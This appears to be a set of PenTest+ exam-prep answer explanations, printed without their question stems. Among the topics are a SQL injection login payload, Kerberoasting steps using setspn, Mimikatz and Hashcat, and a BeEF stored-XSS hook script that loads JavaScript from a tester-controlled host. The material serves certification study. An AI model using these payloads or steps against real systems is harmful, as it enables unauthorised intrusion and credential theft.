Free Practice Questions for CompTIA PT0-003 Exam

The correct answer is A. SQL injection

The request contains a login attempt with the password value:

admin ' or '

This is characteristic of a SQL injection test because the tester is inserting SQL syntax into an input field to manipulate the backend database query. The single quote attempts to break out of the expected string value, and the OR condition attempts to alter the logic of the authentication query.

For example, a vulnerable login query might be manipulated so that the condition always evaluates as true, allowing authentication bypass.

B is incorrect because session hijacking involves stealing or reusing a valid session token or cookie. Although a cookie is present in the request, the attack shown is focused on the login input, not on taking over an existing session.

C is incorrect because brute forcing involves repeatedly trying many username or password combinations. The question shows a crafted payload, not repeated credential guessing.

D is incorrect because cross-site scripting involves injecting JavaScript or HTML into a web page so it executes in a user’s browser. The payload shown is SQL-like syntax, not client-side script code.

In PenTest+ terms, this falls under Attacks and Exploits, specifically web application attacks and authentication bypass attempts using SQL injection.

Kerberoasting is an attack that involves requesting service tickets for service accounts from a Kerberos service, extracting the service tickets, and attempting to crack them offline to retrieve the plaintext passwords.

Understanding Kerberoasting:

Purpose: To obtain service account passwords by cracking the encrypted service tickets (TGS tickets) offline.

Service Principal Names (SPNs): SPNs are used in Kerberos authentication to uniquely identify a service instance.

Command Breakdown:

setspn.exe -Q /: This command queries all SPNs in the domain.

Use Case: Identifying accounts with SPNs that can be targeted for Kerberoasting.

Kerberoasting Steps:

Identify SPNs: Use setspn.exe to list service accounts with SPNs.

Request TGS Tickets: Request TGS tickets for the identified SPNs.

Extract Tickets: Use tools like Mimikatz to extract the service tickets.

Crack Tickets: Use password cracking tools like Hashcat to crack the extracted tickets offline.

References from Pentesting Literature:

Kerberoasting is a well-documented attack method in penetration testing guides, specifically targeting service accounts in Active Directory environments.

HTB write-ups often detail the use of Kerberoasting for gaining credentials from service accounts.

Step-by-Step ExplanationReferences:

Penetration Testing - A Hands-on Introduction to Hacking

HTB Official Writeups

======

The given statements are actionable steps aimed at improving security. They fall under the recommendations section of a penetration test report. Here’s why option D is correct:

Recommendations: This section of the report provides specific actions that should be taken to mitigate identified vulnerabilities and improve the overall security posture. Implementing a WAF, upgrading operating systems, and implementing a secure SDLC are recommendations to enhance security.

Executive Summary: This section provides a high-level overview of the findings and their implications, intended for executive stakeholders.

Attack Narrative: This section details the steps taken during the penetration test, describing the attack vectors and methods used.

Detailed Findings: This section provides an in-depth analysis of each identified vulnerability, including evidence and technical details.

References from Pentest:

Forge HTB: The report ' s recommendations section suggests specific measures to address the identified issues, similar to the given statements​​.

Writeup HTB: Highlights the importance of the recommendations section in providing actionable steps to improve security based on the findings from the assessment​​.

Conclusion:

Option D, recommendations, is the correct section where the given statements would be found in a penetration test report.

======

Installation:

Nmap can be installed on various operating systems. For example, on a Debian-based system:

sudo apt-get install nmap

Basic Network Scanning:

To scan a range of IP addresses in the network:

nmap -sP 192.168.1.0/24

Service and Version Detection:

To scan for open ports and detect the service versions running on a specific host:

nmap -sV 192.168.1.10

Enumerating Domain Systems:

Use Nmap with additional scripts to enumerate domain systems. For example, using the --script option:

nmap -p 445 --script=smb-enum-domains 192.168.1.10

Advanced Scanning Options:

Stealth Scan: Use the -sS option to perform a stealth scan:

nmap -sS 192.168.1.10

Aggressive Scan: Use the -A option to enable OS detection, version detection, script scanning, and traceroute:

nmap -A 192.168.1.10

Real-World Example:

A penetration tester uses Nmap to enumerate the systems within a domain by scanning the network for live hosts and identifying the services running on each host. This information helps in identifying potential vulnerabilities and entry points for further exploitation.

References from Pentesting Literature:

In " Penetration Testing - A Hands-on Introduction to Hacking, " Nmap is extensively discussed for various stages of the penetration testing process, from reconnaissance to vulnerability assessment.

HTB write-ups often illustrate the use of Nmap for network enumeration and discovering potential attack vectors.

The correct answer is A. Port mirroring

Port mirroring, also known as SPAN, allows network traffic from one or more switch ports to be copied to a monitoring port. This lets the tester passively observe network communications without directly interacting with production systems.

This is especially appropriate in sensitive environments such as ICS, SCADA, OT, and power plant control networks, where active scanning or probing may disrupt operations. Since the tester needs to identify vulnerabilities observable in the network stack while following rules that prohibit interaction with production systems, passive traffic capture through port mirroring is the safest and most appropriate technique.

B is incorrect because storyboarding is a planning or communication technique and does not observe network-stack behavior.

C is incorrect because a write blocker is used in forensic investigations to prevent modification of storage media. It does not help assess network-stack vulnerabilities.

D is incorrect because a SAST tool analyzes source code for vulnerabilities. It does not passively inspect live network traffic or network-stack behavior.

In PenTest+ terms, this falls under Information Gathering and Vulnerability Scanning, specifically passive reconnaissance, network traffic analysis, and safe testing practices in ICS/OT environments.

The tool and command provided by option B are used to perform passive DNS enumeration, which can uncover subdomains associated with a domain. Here’s why option B is correct:

amass enum -passive -d comptia.org: This command uses the Amass tool to perform passive DNS enumeration, effectively identifying subdomains of the target domain. The output provided (subdomains) matches what this tool and command would produce.

nslookup -type=SOA comptia.org: This command retrieves the Start of Authority (SOA) record, which does not list subdomains.

nmap -Pn -sV -vv -A comptia.org: This Nmap command performs service detection and aggressive scanning but does not enumerate subdomains.

shodan host comptia.org: Shodan is an internet search engine for connected devices, but it does not perform DNS enumeration to list subdomains.

References from Pentest:

Writeup HTB: Demonstrates the use of DNS enumeration tools like Amass to uncover subdomains during external assessments​​.

Horizontall HTB: Highlights the effectiveness of passive DNS enumeration in identifying subdomains and associated information​​.

======

The correct answer is B. Use BeEF and insert payload < script src= " http:// < tester-IP > :3000/hook.js " >

BeEF, the Browser Exploitation Framework, is specifically designed to exploit client-side browser vulnerabilities and control browsers that load a malicious JavaScript hook. In a stored XSS scenario, inserting the BeEF hook script into a vulnerable comment form causes any user who views the comment to load the attacker-controlled JavaScript.

The payload:

< script src= " http:// < tester-IP > :3000/hook.js " >

loads BeEF’s hook script from the tester’s system. Once the victim browser executes the script, the browser becomes “hooked,” allowing the tester to perform browser-based post-exploitation actions within the authorized scope of the engagement.

A is incorrect because Evilginx is mainly used for adversary-in-the-middle phishing and credential/session capture, not for controlling browsers through stored XSS.

C is incorrect because a Netcat listener and an iframe pointing to /bin/bash will not create a browser reverse shell. Browsers cannot execute /bin/bash on the victim host simply through an iframe.

D is incorrect because the listed Metasploit module and image tag do not represent the standard method for hooking browsers through stored XSS.

In PenTest+ terms, this falls under Attacks and Exploits, specifically stored cross-site scripting and browser exploitation using JavaScript-based payloads.

In OSINT, the tester’s objective is to gather information using publicly available, non-intrusive sources without altering the target environment. A robots.txt file is a crawler directive that can discourage or block specific search engine bots from indexing certain paths. If one “major” engine is explicitly blocked, the most practical OSINT adjustment is to use other search engines and data providers that may not be restricted in the same way or may already have historical indexing and cached results. This aligns with PenTest+ reconnaissance techniques that emphasize using multiple sources and pivoting between providers to maximize coverage and reduce blind spots.

Modifying the WAF or changing robots.txt would be active alteration of the client’s systems and is not an OSINT method; it also typically falls outside the intent of passive recon and may violate rules of engagement. A CSRF attack is an exploitation technique unrelated to discovering publicly indexed information. Therefore, leveraging a competing provider is the best way to continue OSINT collection when one crawler is blocked.

The key detail in the Nmap scan output is that port 2222/tcp is open and running the SSH service. The standard SSH port is 22, so if the tester was attempting to connect on port 22, they would not succeed because SSH is instead listening on port 2222.

This is a common security hardening tactic—moving services to non-standard ports to reduce automated attacks.

There is no indication that the service is blocked (B), or requires certificates (C), or is inactive (D), because Nmap clearly shows the service is open and identified.

CompTIA PenTest+ Reference:

PT0-003 Objective 3.3: Analyze tool output or data related to engagement activities.

Nmap usage and interpreting scan results is emphasized in multiple sections.

Penetration testers use OSINT (Open-Source Intelligence) tools to collect and analyze reconnaissance data.

Maltego (Option C):

Maltego is a powerful graph-based OSINT tool that integrates data from multiple sources (e.g., social media, DNS records, leaked credentials).

It automates data correlation and helps visualize connections.